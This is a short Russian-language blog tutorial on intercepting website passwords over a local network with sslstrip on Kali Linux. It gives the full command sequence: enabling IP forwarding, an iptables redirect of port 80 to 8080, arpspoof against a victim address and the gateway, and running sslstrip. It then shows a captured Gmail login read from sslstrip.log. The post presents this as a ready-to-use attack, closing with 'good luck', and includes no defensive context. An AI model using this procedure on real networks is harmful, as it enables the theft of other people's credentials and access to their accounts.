Рейтинг@Mail.ru

Kali Linux: Используем sslstrip для перехвата пароля

: в разделе: Open Source
12400

kali-linux

Утилита sslstrip перехватывает http-трафик с компьютера в локальной сети и таким образом позволяет нам разузнать пароли от каких-нибудь сайтов. Как же пользоваться этой утилитой?

 

Для начала откроем терминал и выполним команду sslstrip -h для того чтобы узнать все опции утилиты.

1b new

Перед тем как начать работать с sslstrip нам нужно проделать кое-какие действия

1. Нам нужно включить IP Forwarding

echo ‘1’ > /proc/sys/net/ipv4/ip_forward


2 new

2. Включить перенаправление запросов с порта 80 на 8080

iptables –t nat –A PREROUTING –p tcp –destination-port 80 –j REDIRECT –to-port 8080

3 new

3. Определяем наш шлюз netstat -nr

4 new

4. Выясняем ip-адрес жертвы (в моем случае это компьютер под управлением Windows XP с IP-адресом 192.168.71.128)

5 new

5. Перенаправляем весь http-трафик с нашего компьютера на шлюз

arpspoof –i eth0 –t 192.168.71.128 –r 192.168.71.2

6 new

Теперь, не закрывая этого окна терминала, открываем еще одно, и запускаем в нем прослушку порта 8080 с помощью sslstrip:

sslstrip –l 8080

8 new

Теперь, я на компьютере жертвы захожу в гугло-почту:

9 new

После того как я зашел в почту, на компьютере с Kali Linux в окне терминала с работающим sslstrip нажимаю ctrl+c для отмены операции. Вся полученная информация будет сохранена в файл sslstrip.log

10a new

11 new

Посмотрим содержимое файла:

cat sslstrip.log - логин и пароль обведены в красную рамку

12 new

Вот так это все работает, удачи!

0
Привязка к тегам kali Linux хак

Оставить комментарий

Гость Воскресенье, 22 Октябрь 2017